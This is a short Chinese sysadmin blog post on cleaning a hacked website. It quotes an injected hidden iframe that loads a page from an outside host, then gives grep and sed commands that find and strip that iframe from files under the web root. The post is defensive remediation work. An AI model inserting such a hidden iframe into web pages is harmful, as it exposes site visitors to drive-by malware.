首先利用工具分析查找出恶意代码(firebug、httpwatch等来分析)
恶意代码如下:
<iframe src=http://lcvo.3322.org/dszq/8.htm width=111 height=0 border=0></iframe>
解决方法:
1.查找出包含恶意代码的所有文件名,输入到日志中
grep "<iframe src=http\:\/\/lcvo\.3322\.org\/dszq\/8\.htm width=111 height=0 border=0><\/iframe>" -rl /data/www/wwwroot >/root/trojan.log
2.查询网站目录下面所有文件,发现文件含有恶意代码,删除恶意代码!
sed -i "s/<iframe src=http\:\/\/lcvo\.3322\.org\/dszq\/8\.htm width=111 height=0 border=0><\/iframe>/ /g" `grep "<iframe src=http\:\/\/lcvo\.3322\.org\/dszq\/8\.htm width=111 height=0 border=0><\/iframe>" -rl /data/www/wwwroot/`
本文转自 liang3391 51CTO博客,原文链接:http://blog.51cto.com/liang3391/563649
![1、Linux 命令行使用技巧[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)